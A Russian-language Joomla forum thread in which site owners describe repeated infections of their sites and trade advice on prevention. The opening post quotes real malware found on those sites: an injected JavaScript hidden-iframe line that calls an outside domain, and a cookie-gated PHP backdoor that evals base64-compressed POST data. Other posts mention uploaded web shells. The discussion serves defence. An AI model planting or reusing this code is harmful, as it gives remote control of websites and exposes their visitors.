0 Пользователей и 1 Гость просматривают эту тему.
  • 23 Ответов
  • 2982 Просмотров
*

Craze

  • Осваиваюсь на форуме
  • 88
  • 0
Долго я держал себя в руках, но все же открою топик на эту тему, тк последнее время начинает конкретно надоедать все это.
У меня несколько десятков сайтов, все на разные таматики, версия Joomla 1.5 и 2.5
За последние два месяца частота заражения сайтов начинает напрягать.
Что есть.
К примеру:
Хостинг.
Пароль на FTP в 18 значений, в перемешку буквы и символы
ОС Mac os - сразу исключаю взлом через FTP (может я не прав - поясните)

Сайт Joomla 2.5.9
Стоит:
Akeeba (акиба не самой последней версии, тк PHP 5.2.17)
Zoo
JCE
Jcomments
RSFirewall
sh404SEF
AcyMailing
Widgetkit

на некоторых стоит VirtueMart

Это список основоного, так сказать.

Что обычно происходит.

Вариант 1:
Идет замена .htaccess файла (вписывается код в центр его ил ив конец.) Если права поставить 444, то файл переименовывается, а рядом кладется другой с кодом.

Вариант два 2:
Во всех JS файлах добавляется внизу строчка вида (бывают разные):
Код
;document.write('<iframe src="http://dphttz.rebatesrule.net/64e79f785494a6a4c59cc.SBC8o29lvoUtUsbg?default" name="Sandal" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>');

Вариант 3:
В огромном количестве. практически в каждой паке добавляется файл вида:
b18gr.php
с кодом: <?php echo "#!!#";
Зачем это делается - не пойму. Но некоторые компоненты перестают работать в админке. К примеру Акиба и ZOO
Поясните?

Вариант 4:

Этот вариант работает с вариантом 3 обычно. В некоторых папках создается второй файлик php с рандомным именем, но в нем уже код вида:

Код
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Иногда на версиях 1.5 можно найти залитый шелл в tmp папку или images, но сейчас вижу это редко.

Вопросы - как вы боритесь с этим? Меня интересует именно предотвращение заражения, а не как вычистить это все. Как чистить и так понятно, а вот как уберечься - не понимаю уже, тк обновления до последних версий не помогают.
Где искать дырку?
Знаю причины в том же JCE были, но сейчас на последних версиях вроде нет.
Была проблема с темой Bluestock для админки, но сейчас это тоже не актуально, вроде как.
Что делать? что делаете вы, как с этим жить? :)
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
*

Craze

  • Осваиваюсь на форуме
  • 88
  • 0
у части сайтов да. между собой не связаны.
*

ELLE

  • Support Team
  • 4598
  • 867
расширения используете не из официальных источников? (шаблоны, модули, плагины, компоненты)
*

Pazys

  • Практически профи
  • 1846
  • 237
  • <a>А где я ошибся-то?</b>
Сайт Joomla 2.5.9
Стоит:
1. Akeeba (акиба не самой последней версии, тк PHP 5.2.17)
2. Zoo
3. JCE
4. Jcomments
5. RSFirewall
6. sh404SEF
7. AcyMailing
8. Widgetkit

ТОчно не скажу, но:
6. 1 год - 39 убитых евнухов
8. Full версия как минимум 29 евреев

Если не платили, то вспоминайте про "Бесплатный сыр бывает только в мышеловке"
И если остальное скачивали не с официальных сайтов - то тоже-самое.

Так что дыры могут быть там.

А хостинг - у меня был один раз лом хостинга ... и пароль тоже не детский .... в духе "6dgam*lT0dK%B6uhR2"
Ишак меня нюхал ...
Если помог - плюсуйте в карму.
*

ELLE

  • Support Team
  • 4598
  • 867
ТОчно не скажу, но:
6. 1 год - 39 убитых евнухов
скажу точно - 3 года - 0 убитых :-) но стоит абсолютно нормальный, правда жутко устаревший :)
последний раз залили каку с год назад по учетке верстальщика и то только в папку /templates/шаблон/*, так как доступ был только в эту папку :)
*

komert

  • Осваиваюсь на форуме
  • 125
  • 1
Подскажите реально помогающие БЕСПЛАТНЫЕ  расширения для защиты сайта ?
*

ELLE

  • Support Team
  • 4598
  • 867
Подскажите реально помогающие БЕСПЛАТНЫЕ  расширения для защиты сайта ?
по-моему ТС сам просит помощи, или вы его пост приняли за мануал?
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
Подскажите реально помогающие БЕСПЛАТНЫЕ  расширения для защиты сайта ?
Хм, а как еще назвать тему, чтобы можно было всем понятно, где можно ознакомится с отзывами о расширениях для защиты?
http://joomlaforum.ru/index.php/topic,195980.0.html
*

master-smeta

  • Давно я тут
  • 274
  • 9
у меня сейчас такая же проблема. все сайты на Joomla 2.5.9 заражены этой же самой хренью. причем на одном сайте - вариант 2. а на другом и 3й и 4й тоже. не могу дыру найти. весь сайт скачал, вычистил, залил обратно на хост, через 5 минут опять эта гадость.
Что самое фиговое - код, упомянутый в пункте 2, периодически исчезает (правда после него остается ";" и в итоге в конце файлов видим: ;;;;;;;;;;;;;).
Сам впервые с этим сталкиваюсь. Помогите, если кто может!
P.S. из перечисленных плагинов и компонентов - нет ничего. у меня есть: GKTabs, JSCEditor и aiContactSafe.
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
у меня сейчас такая же проблема. все сайты на Joomla 2.5.9 заражены этой же самой хренью. причем на одном сайте - вариант 2. а на другом и 3й и 4й тоже. не могу дыру найти.
Сам впервые с этим сталкиваюсь. Помогите, если кто может!
Как помочь ? Информация есть, расширения есть. Ссылка на платную помощь, в подписи
*

SmokerMan

  • Профи
  • 5333
  • 689
Недавно столкнулся с такой же проблемой)

Зачем это делается - не пойму. Но некоторые компоненты перестают работать в админке. К примеру Акиба и ZOO
Поясните?
Это делается видимо для того что бы прикрыть реальную дыру, которая описана в Вариант 4:. Но это мои предположения.

Адрес сайта можно увидеть? Есть предположения через что это делают.
*

master-smeta

  • Давно я тут
  • 274
  • 9
только что поудалял кучу файлов описанных в варианте 4. теперь ни сайт, ни админка не грузятся :(

а вот если jHackGuard отключить, то все грузится
« Последнее редактирование: 07.03.2013, 15:06:11 от master-smeta »
*

sail-winged

  • Осваиваюсь на форуме
  • 32
  • 0
Сегодня разместил на хостинге шаблон. Админка работает хорошо, а вот сайт не открывается. При подключении коннектится к непонятному  хосту:  ... rebatesrule.net. Проверил другие сайты. Открываются, но все обращаются к этому же хосту. Проверил папки и БД - во всех JS файлах вариант 2. Подскажите для начала, как это вычистить?
« Последнее редактирование: 08.03.2013, 00:03:20 от sail-winged »
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
На счет того как обезопаситься! как минимум знаю несколько эксплоитов только глядя уже по названым компонентам! вследствие чего можно получить целевой доступ к сестеме!
1. сначало закройте потенциально уязвимые месте в компонентах!
2. выставите правильные права на файлы и папки.
3. запретите доступ на выполнение каких либо файлов в папке tmp/
4. поставте дополнительную авторизацию на админку (бейсик авторизацию!)
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

angel-w81

  • Новичок
  • 5
  • 0
Добрый день.
На моем сайте тоже постоянно в папке сайт/tmp/plupload появляются файлы типа logo.php или sesat_1.php
Кто может что-то посоветовать.
Файлы постоянно удаляю но через время появляются.
Хостинг выдает сообщения что на сайте вирус.
Сайт http://www.corporationdp.net

Как то попробовал запустить один из файлов http://www.corporationdp.net/tmp/plupload/mil.php
там как бы форма для загрузки

как думаете еще, для временного решения если на заливаемые файлы установить права доступа 000 для исключения их исполнения? Поможет это?
 !
« Последнее редактирование: 30.07.2015, 13:25:53 от angel-w81 »
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Добрый день.
На моем сайте тоже постоянно в папке сайт/tmp/plupload появляются файлы типа logo.php или sesat_1.php
Кто может что-то посоветовать.
Файлы постоянно удаляю но через время появляются.
Хостинг выдает сообщения что на сайте вирус.
Сайт http://www.corporationdp.net

Как то попробовал запустить один из файлов http://www.corporationdp.net/tmp/plupload/mil.php
там как бы форма для загрузки

как думаете еще, для временного решения если на заливаемые файлы установить права доступа 000 для исключения их исполнения? Поможет это?
 !
вот момент этот уже обсуждался http://joomlaforum.ru/index.php/topic,195980.msg1573058.html#msg1573058
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

angel-w81

  • Новичок
  • 5
  • 0
При много благодарю. Нашел что искал. *DRINK*
*

cex263

  • Осваиваюсь на форуме
  • 41
  • 3
Больше чем уверен - виноват виртуальный хостинг.
Тоже была такая же ерунда, но когда перенёс сайты на VDS, такого больше ни разу не повторялось. Тьфу-тьфу-тьфу!
Пошаговый видеокурс по Joomla 3
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Больше чем уверен - виноват виртуальный хостинг.
Тоже была такая же ерунда, но когда перенёс сайты на VDS, такого больше ни разу не повторялось. Тьфу-тьфу-тьфу!
Да, частенько встречаются уязвимые хостинги, причем когда им сообщаешь, бьют себя в грудь и говорят что у них все пучком)))
P.S: Если не секрет у вас что за хостинг был?
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

cex263

  • Осваиваюсь на форуме
  • 41
  • 3
Пошаговый видеокурс по Joomla 3
*

wishlight

  • Профи
  • 3632
  • 222
  • skype aqaus.com
Джино вообще просто сильно разрекламированный хостинг, не имеющий отношения к качеству. Как правило, ждать бесплатной или дешевой поддержки там не стоит.
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
конкретно, я находил багу в джино, которая до сих пор в приватах хранится... уж как полтора года...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как исправить уязвимость в Joomla 1.5.26 - libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045,?

Автор Elimelech

Ответов: 4
Просмотров: 488
Последний ответ 03.09.2017, 16:24:17
от Sorbon
sql injection for Joomla 3.7

Автор winstrool

Ответов: 5
Просмотров: 302
Последний ответ 22.05.2017, 21:49:11
от Septdir
Взлом Joomla 3

Автор tiberian

Ответов: 1
Просмотров: 266
Последний ответ 31.03.2017, 16:16:50
от SeBun
Совет по Joomla 3.6.5

Автор blackenvy

Ответов: 14
Просмотров: 279
Последний ответ 28.03.2017, 13:53:07
от dmitry_stas
базы данных в папке администратора и безопасность

Автор Antonio Racter

Ответов: 3
Просмотров: 133
Последний ответ 26.03.2017, 17:41:13
от Antonio Racter